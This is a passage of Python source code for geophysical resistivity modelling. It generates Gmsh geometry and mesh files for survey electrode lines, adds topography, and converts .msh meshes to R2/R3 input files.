self.electrode_array = np.array(elec_list)
def make_lines(self,start_lines=1):
self.start_lines=start_lines
self.lines = {}
self.surveyline_startend = {}
self.startpt,self.endpt = [],[]
key_order_se = []
for ikey in self.points['order']:
# Collect consecutive points into lines in reverse order
line_keys = self.points[ikey]['order']
# record start and end positions of line
self.startpt.append(line_keys[0])
self.endpt.append(line_keys[-1])
# Save first line in section
self.surveyline_startend[ikey] = [self.start_lines]
key_order_se.append(ikey)
key_order = []
for istart,iend in zip(line_keys[:-1],line_keys[1:]):
self.lines.update({self.start_lines:[istart,iend]})
key_order.append(self.start_lines)
self.start_lines+=1
self.lines.update({'order':key_order})
# Save last line in section
self.surveyline_startend[ikey].append(self.start_lines-1)
self.surveyline_startend.update({'order':key_order_se})
# Connectors for the lines
if len(self.startpt)>1:
for istart1,istart2 in zip(self.startpt[:-1],self.startpt[1:]):
self.lines.update({self.start_lines:[istart1,istart2]})
self.lines['order'].append(self.start_lines)
self.start_lines+=1
for end1,iend2 in zip(self.endpt[:-1],self.endpt[1:]):
self.lines.update({self.start_lines:[end1,iend2]})
self.lines['order'].append(self.start_lines)
self.start_lines+=1
def make_boundaries(self,nforeground=4,nbackground=4):
'''Make boundaries from survey bounds.
Can eventually add capability to define non-square boundaries
'''
self.boundaries = {}
# First make foreground boundaries by extending some constant beyond
# the corner points
fore_corners = np.arange(self.count_pts,self.count_pts+nforeground)
self.count_pts = self.count_pts+nforeground
fore_pairs = np.c_[fore_corners,np.roll(fore_corners,-1)]
self.boundaries['foreground'] = {}
self.boundaries['foreground'].update(self.lines.copy())
key_order = []
key_order.extend(self.lines['order'])
self.boundaries['foreground'].update({self.start_lines:[self.endpt[0],fore_pairs[-1,1]]})
key_order.append(self.start_lines)
self.start_lines += 1
self.fore_lines=[]
for ifore in np.arange(nforeground-1):
self.boundaries['foreground'].update({self.start_lines:
fore_pairs[ifore,:].tolist()})
key_order.append(self.start_lines)
self.fore_lines.append(self.start_lines)
self.start_lines += 1
self.boundaries['foreground'].update({self.start_lines:[fore_pairs[-1,0],self.startpt[0]]})
key_order.append(self.start_lines)
self.boundaries['foreground'].update({'order':key_order})
self.start_lines += 1
# Background points and lines
back_corners = np.arange(self.count_pts,self.count_pts+nbackground)
self.count_pts = self.count_pts + nbackground
back_pairs = np.c_[back_corners,np.roll(back_corners,-1)]
key_order = []
self.boundaries['background'] = {}
self.boundaries['background'].update({self.start_lines:[fore_pairs[0,0],back_pairs[0,0]]})
key_order.append(self.start_lines)
self.start_lines += 1
for iback in np.arange(nbackground-1):
self.boundaries['background'].update({self.start_lines:
back_pairs[iback,:].tolist()})
key_order.append(self.start_lines)
self.start_lines += 1
self.boundaries['background'].update({self.start_lines:[back_pairs[-1,0],fore_pairs[-1,0]]})
key_order.append(self.start_lines)
self.boundaries['background'].update({'order':key_order})
self.start_lines += 1
def make_surfaces(self):
self.surfaces = {}
seg_dict = {'nelectrodes':self.nelectrodes_per_line,
'nlines':self.nlines,
'topbot':True,
'iline':np.arange(2*(self.nlines-1))}
self.connecting_segs = mesh_utils.segment_loc(**seg_dict).reshape((2,-1)).T
self.surflines = {} # will have "Line Loop(#) = {}
key_order_sl = []
key_order_s = []
# Make bounding foreground surface from foreground lines and line-bounding lines
self.surflines.update({self.start_lines:np.roll(self.boundaries['foreground']['order'],1).tolist()}) # foreground boundary
key_order_sl.append(self.start_lines)
self.start_lines += 1
self.surfaces.update({self.start_lines:[self.start_lines-1]})
key_order_s.append(self.start_lines)
self.start_lines += 1
# Make background surface between foreground and background lines
foreline_order = -1*np.array(self.fore_lines)[::-1]
background_order = np.hstack([foreline_order,self.boundaries['background']['order']])
self.surflines.update({self.start_lines:background_order.tolist()}) # background line
key_order_sl.append(self.start_lines)
self.surflines.update({'order':key_order_sl})
self.start_lines += 1
self.surfaces.update({self.start_lines:[self.start_lines-1]})
key_order_s.append(self.start_lines)
self.surfaces.update({'order':key_order_s})
def make_regions(self, region_xyzpts=None, extend_to=None,
clen=None, boundary_dict=None,region_fname=None,load_dict=None,
outside_foreground=False,active_domain='foreground'):
'''Create geometry components for assigning model region.'''
# ----------------- Load region data ---------------------------
if region_fname is not None:
region_xyzpts=[]
for region_temp in region_fname:
region_xyz_temp,header_info = load_delim(region_temp,**load_dict)
if region_xyz_temp.shape[-1]<3:
region_xyz_temp = np.hstack([region_xyz_temp,np.zeros((region_xyz_temp.shape[0],1))])
region_xyzpts.append(region_xyz_temp)
if isinstance(region_xyzpts,(list,tuple)):
try:
region_xyzpts = np.array(region_xyzpts)
except:
print("Could not convert region_xyzpts to np.ndarray...Assuming it is a list of region arrays")
if isinstance(region_xyzpts,np.ndarray):
# Fill elevation, z, column with zeros if not existing
if region_xyzpts.shape[-1]<3:
region_xyzpts = np.hstack([region_xyzpts,np.zeros((region_xyzpts.shape[0],1))])
if len(region_xyzpts.shape)<3:
# Stack regions into 3rd dimension
region_xyzpts = [region_xyzpts]
self.region_xyzpts = region_xyzpts
# -------------- Make region geometry components ---------------------
self.region_dict = {}
iregion_count = 0
for iregion_xyzpts in self.region_xyzpts:
if active_domain in ['foreground'] and extend_to in ['background']:
# First create a region in the foreground that will then be
# extended into the background as well
geom_dict = {'points':self.points.copy(),
'boundaries':self.boundaries.copy(),
'surflines':self.surflines.copy(),
'fore_lines':self.fore_lines}
# Find xyz points inside foreground
foreground_bounds,foreground_bool = mesh_utils.calc_region_bounds(region='foreground',
geom_dict=geom_dict,
xyz = iregion_xyzpts)
ipts_foreground = iregion_xyzpts[foreground_bool,:].copy()
ipts_background = iregion_xyzpts[~foreground_bool,:].copy()
iregion_xyzpts = ipts_background.copy() # replace with only pts in background region
make_region_dict = {'geom_dict':geom_dict,
'start_line_num':self.start_lines,
'start_pt_num':self.count_pts,
'extend_to':'foreground',
'region_xyzpts':ipts_foreground,
'boundary_dict':boundary_dict,
'clen':clen,
'active_domain':active_domain}
region_out_dict,self.start_lines,self.count_pts = mesh_utils.make_region(**make_region_dict)
self.region_dict.update({iregion_count:region_out_dict['region_dict']})
self.boundaries = region_out_dict['boundaries'].copy()
self.surflines = region_out_dict['surflines'].copy()
active_domain = 'background' # overwrite to make background region
# Update region order
if 'order' not in self.region_dict.keys():
self.region_dict.update({'order':[iregion_count]})
else:
self.region_dict['order'].append(iregion_count)
# Create region in "active_domain"
geom_dict = {'points':self.points.copy(),
'boundaries':self.boundaries.copy(),
'surflines':self.surflines.copy(),
'fore_lines':self.fore_lines}
make_region_dict = {'geom_dict':geom_dict,
'start_line_num':self.start_lines,
'start_pt_num':self.count_pts,
'extend_to':extend_to,
'region_xyzpts':iregion_xyzpts,
'boundary_dict':boundary_dict,
'clen':clen,
'active_domain':active_domain}
region_out_dict,self.start_lines,self.count_pts = mesh_utils.make_region(**make_region_dict)
self.region_dict.update({iregion_count:region_out_dict['region_dict']})
self.boundaries = region_out_dict['boundaries'].copy()
self.surflines = region_out_dict['surflines'].copy()
# Update region order
if 'order' not in self.region_dict.keys():
self.region_dict.update({'order':[iregion_count]})
else:
self.region_dict['order'].append(iregion_count)
def write_geo(self,out_fname=None,boundary_dict=None,extrude_dict=None,ndigits=2,
region_dict=None):
'''Write .geo file.
'''
gmsh_geo_dict = {'gmsh_obj':self,'out_fname':out_fname,
'boundary_dict':boundary_dict,
'extrude_dict':extrude_dict,
'ndigits':ndigits,'mesh_dim':2,
'region_dict':region_dict}
write_gmsh_geo(**gmsh_geo_dict)
self.geo_name = out_fname
def run_gmsh(self,silent=True,report=True,
gmshdir = r'D:\Research\Software\gmsh-2.16.0-Windows',
gmshexe = 'gmsh.exe',optimize=False, num_quad_lloyd_steps=0, dim=3,
normal_msg = 'stopped on'):
'''Run gmsh executable.
Source: after https://github.com/nschloe/pygmsh/blob/master/pygmsh/helper.py#generate_mesh
'''
cwd = os.path.dirname(self.geo_name)
cmd_list = [os.path.join(gmshdir,gmshexe), '-{0:d}'.format(dim), self.geo_name, '-o', self.msh_name]
if optimize:
cmd_list += ['-optimize']
if num_quad_lloyd_steps > 0:
cmd_list += ['-optimize_lloyd', str(num_quad_lloyd_steps)]
run_dict = {'cmd_list':cmd_list,'cwd':cwd,'silent':silent,
'normal_msg':normal_msg,'report':report}
self.success,self.buff = pyres_utils.run_cmd(**run_dict)
def locate_inf_electrode(self,inf_electrode_xy=[None,None],
msh_name=None):
'''Find mesh node of inf electrode(s).'''
if hasattr(self,'msh_name'):
# Load .msh file
msh_dict = read_gmsh(msh_fname=self.msh_name)
elif msh_name is not None:
msh_dict = read_gmsh(msh_fname=msh_name)
else:
print("msh_name needs to be assigned.")
# Find closest node to infinity electrode
# 1) Try to find perfect match
match_inds = pyres_utils.match_xy(XY=msh_dict['nodes'][:,0:2],
xy_to_match = np.array(inf_electrode_xy))
if len(match_inds)<1.:
dist_array = np.sqrt((inf_electrode_xy[0]-msh_dict['nodes'][:,0])**2.+\
(inf_electrode_xy[1]-msh_dict['nodes'][:,1])**2.)
match_ind = np.argmin(dist_array)+1 # account for 1-based indexing
return match_ind,msh_dict['nodes'][match_ind,:]
def msh_to_dat(self,msh_fname=None,out_file='mesh.dat', topo_correct=False,
topo_dict=None, overwrite=True, verbose=False, job_type=1,
alpha_scale=1.,node_zones=None,param_zones=None):
'''Convert .msh to .dat for R2.'''
if msh_fname is None:
msh_fname = self.msh_name
gmsh_to_R2_dict= {'msh_fname':msh_fname,'out_file':out_file,
'topo_correct':topo_correct,'topo_dict':topo_dict,
'overwrite':overwrite,'verbose':verbose,
'alpha_scale':alpha_scale,
'node_zones':node_zones,'param_zones':param_zones}
self.gmsh_to_R2_msg,self.nregions, self.mesh_dict,self.topo_xyz = gmsh_to_R2(**gmsh_to_R2_dict)
def make_mesh(self,geom_dict=None,write_dict=None,
run_gmsh=False, gmsh_dict=None,
region_dict=None):
'''Run individual functions to make mesh.
'''
self.make_points(**geom_dict)
self.make_lines()
self.make_boundaries()
self.make_surfaces()
if region_dict is not None:
self.make_regions(**region_dict)
write_dict.update({'region_dict':region_dict})
self.write_geo(**write_dict)
if run_gmsh:
self.msh_name = "{}.msh".format(os.path.splitext(self.geo_name)[0])
if gmsh_dict is None:
self.run_gmsh()
else:
self.run_gmsh(**gmsh_dict)
#%% ------------------ Utilities ------------------
def write_gmsh_geo(gmsh_obj=None,out_fname=None,boundary_dict=None,
extrude_dict=None,ndigits=2,mesh_dim=3,region_dict=None):
'''Write gmsh .geo file.'''
if extrude_dict is None and mesh_dim==3:
mesh_dim = 2
# Keep track of written geometries
all_pts = []
all_lines = []
foreground_pt_fmt = "Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }}\n"
out_fore_mult = mesh_utils.find_line_orientation(gmsh_obj)
with open(out_fname,'w') as f:
f.write("// Gmsh project created using Python on {}\n".format(time.strftime("%Y-%m-%d %H:%M:%S",time.localtime())))
# Write point data by survey row
for i in gmsh_obj.points['order']:
f.write("// Points for row {}\n".format(i+1))
for ipt,lineptkey in enumerate(gmsh_obj.points[i]['order']):
x,y,z,clen = gmsh_obj.points[i][lineptkey]
f.write("Point({0}) = {{{1}, {2}, {3}, {4}}};\n".format(lineptkey,x,y,z,clen)) # reverse x,y to match R3 example
all_pts.append(lineptkey)
f.write("\n") # blank space
if mesh_dim == 2:
# Write Translate command for external foreground boundaries
f.write(foreground_pt_fmt.format(boundary_dict['fdxdy'][0],0.,0,np.max(gmsh_obj.endpt)))
f.write(foreground_pt_fmt.format(boundary_dict['fdxdy'][0],-boundary_dict['fdxdy'][1],0,np.max(gmsh_obj.endpt)))
f.write(foreground_pt_fmt.format(-boundary_dict['fdxdy'][0],-boundary_dict['fdxdy'][1],0,np.min(gmsh_obj.startpt)))
f.write(foreground_pt_fmt.format(-boundary_dict['fdxdy'][0],0.,0,np.min(gmsh_obj.startpt)))
f.write("\n") # blank space
# For far background
f.write("p1[]=Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }};\n".format(boundary_dict['bdxdy'][0]+boundary_dict['fdxdy'][0],0.,0,np.max(gmsh_obj.endpt)))
f.write("p3[]=Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }};\n".format(boundary_dict['bdxdy'][0]+boundary_dict['fdxdy'][0],-boundary_dict['bdxdy'][1],0,np.min(gmsh_obj.endpt)))
f.write("p4[]=Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }};\n".format(-boundary_dict['bdxdy'][0]-boundary_dict['fdxdy'][0],-boundary_dict['bdxdy'][1],0,np.max(gmsh_obj.startpt)))
f.write("p2[]=Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }};\n".format(-boundary_dict['bdxdy'][0]-boundary_dict['fdxdy'][0],0.,0,np.min(gmsh_obj.startpt)))
f.write("\n") # blank space
else:
# Write Translate command for external boundaries, foreground first
f.write(foreground_pt_fmt.format(out_fore_mult[2][0]*boundary_dict['fdxdy'][0],out_fore_mult[2][1]*boundary_dict['fdxdy'][1],0,np.max(gmsh_obj.startpt)))
f.write(foreground_pt_fmt.format(out_fore_mult[0][0]*boundary_dict['fdxdy'][0],out_fore_mult[0][1]*boundary_dict['fdxdy'][1],0,np.min(gmsh_obj.startpt)))
f.write(foreground_pt_fmt.format(out_fore_mult[1][0]*boundary_dict['fdxdy'][0],out_fore_mult[1][1]*boundary_dict['fdxdy'][1],0,np.min(gmsh_obj.endpt)))
f.write(foreground_pt_fmt.format(out_fore_mult[3][0]*boundary_dict['fdxdy'][0],out_fore_mult[3][1]*boundary_dict['fdxdy'][1],0,np.max(gmsh_obj.endpt)))
f.write("\n") # blank space
# For far background
f.write("p1[]=Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }};\n".format(boundary_dict['bdxdy'][0],-boundary_dict['bdxdy'][1],0,np.max(gmsh_obj.startpt)))
f.write("p2[]=Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }};\n".format(-boundary_dict['bdxdy'][0],-boundary_dict['bdxdy'][1],0,np.min(gmsh_obj.startpt)))
f.write("p3[]=Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }};\n".format(-boundary_dict['bdxdy'][0],boundary_dict['bdxdy'][1],0,np.min(gmsh_obj.endpt)))
f.write("p4[]=Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }};\n".format(boundary_dict['bdxdy'][0],boundary_dict['bdxdy'][1],0,np.max(gmsh_obj.endpt)))
f.write("\n") # blank space
# Set characteristic length for background elements
if isinstance(clen,str):
f.write("Characteristic Length {{p1[0], p2[0], p3[0], p4[0]}} = {} * {};\n".format(boundary_dict['bclen'],clen)) # assumes clen used above in this function
else:
f.write("Characteristic Length {{p1[0], p2[0], p3[0], p4[0]}} = {};\n".format(boundary_dict['bclen']*clen))
f.write("\n") # blank space
if hasattr(gmsh_obj,'region_dict'):
if gmsh_obj.region_dict is not None:
# Write region geometry
f.write("// Region points \n")
for i in gmsh_obj.region_dict['order']:
# Write region points
f.write("// Points for region {}\n".format(i+1))
for ipt,lineptkey in enumerate(gmsh_obj.region_dict[i]['region_points']['order']):
x,y,z,clen = gmsh_obj.region_dict[i]['region_points'][lineptkey]
f.write("Point({0}) = {{{1}, {2}, {3}, {4}}};\n".format(lineptkey,x,y,z,clen)) # must reverse x,y to match R3 example
all_pts.append(lineptkey)
f.write("\n")
# Write foreground boundary lines
if mesh_dim == 2:
# Foreground connects into electrode lines
foreground_lines = gmsh_obj.boundaries['foreground']['order']
f.write("// Foreground boundary lines\n")
for i in foreground_lines:
if i not in all_lines:
f.write("Line({0}) = {{{1}}};\n".format(i,', '.join([str(itemp) for itemp in gmsh_obj.boundaries['foreground'][i]])))
all_lines.append(i)
else:
# Write Line data by row
for iline in gmsh_obj.surveyline_startend['order']:
f.write("// Line {} of electrodes\n".format(iline+1))
line_nums = np.arange(gmsh_obj.surveyline_startend[iline][0],gmsh_obj.surveyline_startend[iline][1]+1)
for line_num in line_nums:
if line_num not in all_lines:
f.write("Line({0}) = {{{1}}};\n".format(line_num,', '.join([str(itemp) for itemp in gmsh_obj.lines[line_num]])))
all_lines.append(line_num)
f.write("\n") # blank space
# Joining lines between electrode lines
join_lines = np.sort(gmsh_obj.connecting_segs.ravel())
f.write("// Lines connecting lines of electrodes\n")
for join_line in join_lines:
if join_line not in all_lines:
f.write("Line({0}) = {{{1}}};\n".format(join_line,', '.join([str(itemp) for itemp in gmsh_obj.lines[join_line]])))
all_lines.append(join_line)
f.write("\n") # blank space
f.write("// Foreground boundary lines\n")
for i in gmsh_obj.boundaries['foreground']['order']:
if i not in all_lines:
f.write("Line({0}) = {{{1}}};\n".format(i,', '.join([str(itemp) for itemp in gmsh_obj.boundaries['foreground'][i]])))
all_lines.append(i)
f.write("\n") # blank space
# Write background boundary lines
f.write("// Background boundary lines\n")
for i in gmsh_obj.boundaries['background']['order']:
if i not in all_lines:
f.write("Line({0}) = {{{1}}};\n".format(i,', '.join([str(itemp) for itemp in gmsh_obj.boundaries['background'][i]])))
all_lines.append(i)
f.write("\n") # blank space
nregion_surfs = 0
surf_keys_ordered = gmsh_obj.surfaces['order']
if hasattr(gmsh_obj,'region_dict'):
if gmsh_obj.region_dict is not None:
# Write region geometry
f.write("// Region data \n")
region_phys_surfline_list = []
region_back_phys_surfline_list = []
region_fore_phys_surfline_list = []
region_phys_surf_list = []
for i in gmsh_obj.region_dict['order']:
# Write region lines
f.write("// Lines for region {}\n".format(i))
line_nums = gmsh_obj.region_dict[i]['region_lines']['order']
for line_num in line_nums:
if line_num not in all_lines:
f.write("Line({0}) = {{{1}}};\n".format(line_num,', '.join([str(itemp) for itemp in gmsh_obj.region_dict[i]['region_lines'][line_num]])))
all_lines.append(line_num)
f.write("\n") # blank space
# Write region surface
for surfline_key in gmsh_obj.region_dict[i]['region_surflines']['order']:
f.write("Line Loop({0}) = {{{1}}};\n".format(surfline_key,', '.join([str(itemp) for itemp in gmsh_obj.region_dict[i]['region_surflines'][surfline_key]])))
if gmsh_obj.region_dict[i]['active_domain'] in ['foreground']:
region_fore_phys_surfline_list.append(surfline_key)
else:
region_back_phys_surfline_list.append(surfline_key)
for surf_key in gmsh_obj.region_dict[i]['region_surfaces']['order']:
f.write("Plane Surface({0}) = {{{1}}};\n".format(surf_key,', '.join([str(itemp) for itemp in gmsh_obj.region_dict[i]['region_surfaces'][surf_key]])))
region_phys_surf_list.append(surf_key)
f.write("\n") # blank space
# Assign the physical surface for the region
# Assumes only foreground and background assigned earlier
if len(region_back_phys_surfline_list)>0:
gmsh_obj.surfaces[surf_keys_ordered[1]].append(region_back_phys_surfline_list[0]) # add to end of background surface
if len(region_fore_phys_surfline_list)>0:
gmsh_obj.surfaces[surf_keys_ordered[0]].append(region_fore_phys_surfline_list[0]) # add to end of foreground surface
for ireg,reg_surf in enumerate(region_phys_surf_list):
nregion_surfs +=1
f.write("Physical Surface({0}) = {{{1}}};\n".format(nregion_surfs,reg_surf))
# Write the lines needed to make surfaces
f.write("// Foreground and Background surface lines and surfaces\n")
all_surf_keys = np.sort(np.hstack([gmsh_obj.surflines['order'],gmsh_obj.surfaces['order']]))
for i in all_surf_keys:
if i in gmsh_obj.surflines['order']:
f.write("Line Loop({0}) = {{{1}}};\n".format(i,', '.join([str(itemp) for itemp in gmsh_obj.surflines[i]])))
elif i in gmsh_obj.surfaces['order']:
f.write("Plane Surface({0}) = {{{1}}};\n".format(i,', '.join([str(itemp) for itemp in gmsh_obj.surfaces[i]])))
f.write("\n") # blank space
f.write("\n") # blank space
if mesh_dim == 2:
f.write("\n")
for icount,isurf in enumerate(gmsh_obj.surfaces['order']):
f.write("Physical Surface({0}) = {{{1}}};\n".format(icount+nregion_surfs+1,isurf))
else:
# Extrude foreground surfaces
f.write("// Extrude foreground surfaces\n")
prep_nlayers = ', '.join([str(round(itemp,ndigits)) for itemp in extrude_dict['nlayer_list']])
prep_zratios = ', '.join([str(round(itemp,ndigits)) for itemp in extrude_dict['domain_zratios']])
fg_list = []
for icount,isurf in enumerate(gmsh_obj.surfaces['order'][:-1]): # all but the background surface
f.write("fg{0}[] = Extrude {{0,0,{1}}} {{Surface{{{2}}}; Layers{{ {{{3}}}, {{{4}}} }}; Recombine; }};\n".format(\
icount,-extrude_dict['max_depth'],
isurf,
prep_nlayers,
prep_zratios))
fg_list.append("fg{0}[1]".format(icount))
f.write("\n") # blank space
# Extrude background surface
f.write("// Extrude background surface\n")
f.write("bg[] = Extrude {{0,0,{1}}} {{Surface{{{2}}}; Layers{{ {{{3}}}, {{{4}}} }}; Recombine; }};\n".format(\
icount,-extrude_dict['max_depth'],
gmsh_obj.surfaces['order'][-1],
prep_nlayers,prep_zratios))
f.write("\n") # blank space
# Write Physical volumes
f.write("Physical Volume(1) = {{{0}}};\n".format(", ".join(fg_list)))
f.write("Physical Volume(2) = {{{0}}};\n".format('bg[1]'))
def add_topo(msh_fname=None,mesh_dict=None,out_file=None,topo_file=None,
surf_elev=0.,
nxy = 100, method='linear', fill_value=0.,
write_gmsh_bool=False, gmsh_out_fname=None,
r2_bool=True,topo_load_dict={'cols2read':[0,1,2],
'nheaders':1}):
'''Add topography to gmsh .msh file.
Adds topography to a gmsh .msh file. Reads the nodes in 'msh_fname' (the gmsh
3D msh file) and for each elevation 'plane' it perturbs the node
elevation according to the values given in z. z holds the topography
values corresponding to x and y and is interpolated across the gmsh mesh.
NOTE: The upper surface of the original gmsh .msh must be flat and set to surf_elev.
Inputs:
msh_fname: str
gmsh 3D .msh file with flat upper surface with an elevation of surf_elev.
topo_file: str
text file containing x,y,z coordinates in three columns.
method: str
choice of interpolation for 2D interpolation. Currently does not include
options available in addTopo.m (gridfit.m).
r2_bool: boolean
defines whether R2 is being used. If False, assumes 3D mesh for R3.
Output:
out_file: str
the file in which new node elevations and co-ordinates are written
in ASCII format. These data should replace the 'nodes' section
of the original gmsh .msh file.
Source: After Matlab addTopo.m function by James Ramm 2012 in R3 package.'''
from scipy.interpolate import griddata
# Read topography file
if topo_file is not None and os.path.isfile(topo_file):
topo_data,header_info = load_delim(topo_file,**topo_load_dict)
# Read in mesh
if mesh_dict is None: # Load .msh, otherwise use input mesh_dict
mesh_dict = read_gmsh(msh_fname=msh_fname)
# Expand nxy
if isinstance(nxy,(float,int)):
nx,ny = nxy,nxy
else:
nx,ny = nxy
if r2_bool:
# -------- Add topography to 2D mesh -------------
node_xyz = mesh_dict['nodes']
if topo_data.shape[-1]<3:
ydata = topo_data[:,1]
else:
ydata = topo_data[:,2]
# Use z in topofile to adjust node y values
new_y_diff = surf_elev+pyres_utils.extrap(node_xyz[:,0],topo_data[:,0],
ydata,method=method)
node_xyz[:,1] = node_xyz[:,1]+new_y_diff
mesh_dict['nodes'] = node_xyz
else:
# -------- Add topography to 3D mesh -------------
# Find surface coordinates
surface_xyz = mesh_dict['nodes'][mesh_dict['nodes'][:,2]==surf_elev,:] # y,x,z
# Create regularly interpolated grid over full domain
# xdomain = np.linspace(surface_xyz[:,0].min(),surface_xyz[:,0].max(),nx)
# ydomain = np.linspace(surface_xyz[:,1].min(),surface_xyz[:,1].max(),ny)
# X,Y = np.meshgrid(xdomain,ydomain)
# Interpolate topographic data to surface nodes, need to flip x,y in
# surface_xyz to match R3 example (surface_xyz[:,:2][:,::-1])
new_surface_z = griddata(topo_data[:,:2],topo_data[:,2],
surface_xyz[:,:2],
method=method,fill_value=fill_value)
surface_unique_z,layer_inds = np.unique(mesh_dict['nodes'][:,2],return_inverse=True)
# Calculate node-based amount to vertically shift nodes in each layer
surface_zdiff = new_surface_z - surface_xyz[:,2]
# Adjust nodes in all layers by a constant amount
# Note: do not need to loop through individual nodes if all layers are
# ordered the same (i.e., built from extruding a single plane)
output_node_array = mesh_dict['nodes'].copy()
for ilayer, layerz in enumerate(surface_unique_z):
if ilayer != 0: # Do not change the elevation of nodes in the lowest layer
active_layer = layer_inds == ilayer
output_node_array[active_layer,2] = output_node_array[active_layer,2] + surface_zdiff
mesh_dict['nodes'] = output_node_array
if write_gmsh_bool:
if gmsh_out_fname is None:
gmsh_out_fname = msh_fname
write_gmsh(msh_fname=gmsh_out_fname, mesh_dict=mesh_dict)
return mesh_dict,topo_data
else:
print("topo_file not specified or does not exist: {}\n".format(topo_file))
def read_gmsh(msh_fname=None):
'''Read gmsh .msh file.'''
# Initialize values of switches
inFormat, inNodes, inElements = 0, 0, 0
# Read gmsh .msh file
with open(msh_fname,'r') as fid:
for line in fid:
# Check for section headers to determine action
if line[0] == '$':
if line.find('Nodes') > 0: inNodes = 1
if line.find('EndNodes') > 0: inNodes = 0
if line.find('Elements') > 0: inElements = 1
if line.find('EndElements') > 0: inElements = 0
if line.find('MeshFormat') > 0: inFormat = 1
if line.find('EndMeshFormat') > 0: inFormat = 0
else: # Not a section header
if inNodes == 1: # Node section
if len(line.split()) <= 2: # No spatial information, initiate
nodes = []
else: # Store spatial information
entry = list(map(float, line.split()))[1:] # Convert to float
nodes.append(entry)
elif inElements == 1: # Element section
if len(line.split()) <= 2: # No spatial information, initiate
prisms, tets, zones = [], [], []
triags = []
elem_info = []
else:
entry = list(map(int, line.split()))[1:]
elem_info.append(entry[:4])
# mapping physical region to zone number
if entry[0] == 6:
prisms.append(entry[-6:] + [entry[2]])
zones.append(entry[2])
elif entry[0] == 4:
tets.append(entry[-4:] + [entry[2]])
zones.append(entry[2])
elif entry[0] == 2:
triags.append(entry[-3:] + [entry[2]])
zones.append(entry[2])
elif inFormat == 1: # Format information (for re-writing .msh)
mesh_format = line # save as read
# Check and assign mesh type
if len(prisms) > len(tets):
npere = 6
mesh_type = 'Triangular prisms'
elements = prisms
elif len(tets) > len(triags):
npere = 4
mesh_type = 'Tetrahedra'
elements = tets
else:
npere = 2
mesh_type = 'Triangular'
elements = triags
mesh_dict = {'npere':npere,'mesh_type':mesh_type,'nodes':np.array(nodes),
'elements':np.array(elements),'elem_info':np.array(elem_info),
'zones':zones,'mesh_format':mesh_format}
return mesh_dict
def write_gmsh(msh_fname=None,mesh_dict=None):
'''Write gmsh .msh file.'''
with open(msh_fname,'w') as mfid:
# Write mesh format
mfid.write('$MeshFormat\n')
mfid.write("{}".format(mesh_dict['mesh_format']))
mfid.write('$EndMeshFormat\n')
# Write node data
mfid.write('$Nodes\n')
mfid.write('{0:d}\n'.format(mesh_dict['nodes'].shape[0]))
for inode, node_row in enumerate(mesh_dict['nodes'].tolist()):
mfid.write('{0:d} {1:f} {2:f} {3:f}\n'.format(inode+1,node_row[0],node_row[1],node_row[2]))
mfid.write('$EndNodes\n')
# Write element data
mfid.write('$Elements\n')
mfid.write('{0:d}\n'.format(mesh_dict['elements'].shape[0]))
for ielem,(elem_row,info_row) in enumerate(zip(mesh_dict['elements'].astype(str),mesh_dict['elem_info'].astype(str))):
# Number of entities, dimension, slave tag, master tag, slave node, master node
mfid.write('{0} {1} {2}\n'.format(ielem+1," ".join(info_row)," ".join(elem_row[:-1])))
mfid.write('$EndElements\n')
def gmsh_to_R3(msh_fname=None,out_file='mesh3d.dat', topo_correct=False,
topo_dict=None, overwrite=True, verbose=False,alpha_scale=1,
job_type=1):
'''Convert .msh to R3 mesh3d.dat.
Source: After Gmsh2R3t.py by Florian Wagner 2012 from R3t package'''
if topo_correct:
mesh_dict,topo_data = add_topo(msh_fname=msh_fname,**topo_dict)
else:
mesh_dict = read_gmsh(msh_fname=msh_fname)
topo_data = None
# Write new mesh3d.dat file
if os.path.dirname(out_file) in ['']:
# Save to same dirictory as .msh file
output_file = os.path.join(os.path.dirname(msh_fname),out_file)
else:
output_file = out_file # Directory already specified in output
exist_flag=0
if os.path.isfile(output_file):
print("Warning: {} is already created. Default is to overwrite.".format(output_file))
exist_flag = 1
unq_zones = np.unique(mesh_dict['elements'][:,-1])
if exist_flag == 0 or overwrite:
with open(output_file,'w') as wfid:
# Define mesh components. Create one dirichlet node, datum = 0
wfid.write('%d %d 1 0 %d \n' % (len(mesh_dict['elements']), len(mesh_dict['nodes']), mesh_dict['npere']))
if isinstance(mesh_dict['elements'],np.ndarray):
mesh_dict['elements'] = mesh_dict['elements'].tolist()
for i, elem in enumerate(mesh_dict['elements']):
wfid.write('%d ' % (i + 1))
elem.insert(-1, i+1) # unique parameter number
for entry in elem:
wfid.write('%d ' % entry)
wfid.write('\n')
wfid.write('\n')
for i, node in enumerate(mesh_dict['nodes']):
node_entry = list(node)
node_entry.insert(0, i+1)
wfid.write('%d %10.3f %10.3f %10.3f \n' % tuple(node_entry) )
wfid.write('1\n') # dirichlet node
# Define smoothing scale for each mesh zone
if job_type == 1 or job_type in ['inv','inverse','Inv','Inverse']:
if len(unq_zones)> 1:
if isinstance(alpha_scale,(int,float)):
alpha_scale = alpha_scale*np.ones_like(unq_zones)
for izone,alpha_scale_temp in enumerate(alpha_scale):
wfid.write('{0:d} {1:f}\n'.format(izone+1,alpha_scale_temp))
# Show mesh information
message = """
%s has been successfully created.
Mesh Info:
Type of elements: %s
Nodes: %d
Elements: %d
Zones: %d
""" % (os.path.basename(output_file), mesh_dict['mesh_type'],
len(mesh_dict['elements']), len(mesh_dict['nodes']),
len(set(mesh_dict['zones'])))
if verbose:
print(message)
return message,len(unq_zones),mesh_dict,topo_data
def gmsh_to_R2(msh_fname=None,out_file='mesh.dat', topo_correct=False,
topo_dict=None, overwrite=True, verbose=False,alpha_scale=1,
node_zones=None,param_zones=None,default_zone=1):
'''Convert .msh to R2 mesh.dat.
Source: After Gmsh2R3t.py by Florian Wagner 2012 from R3t package'''
if topo_correct:
mesh_dict,topo_data = add_topo(msh_fname=msh_fname,**topo_dict)
else:
mesh_dict = read_gmsh(msh_fname=msh_fname)
topo_data = []
if node_zones is None and len(np.unique(mesh_dict['zones']))==1:
node_zones = {}
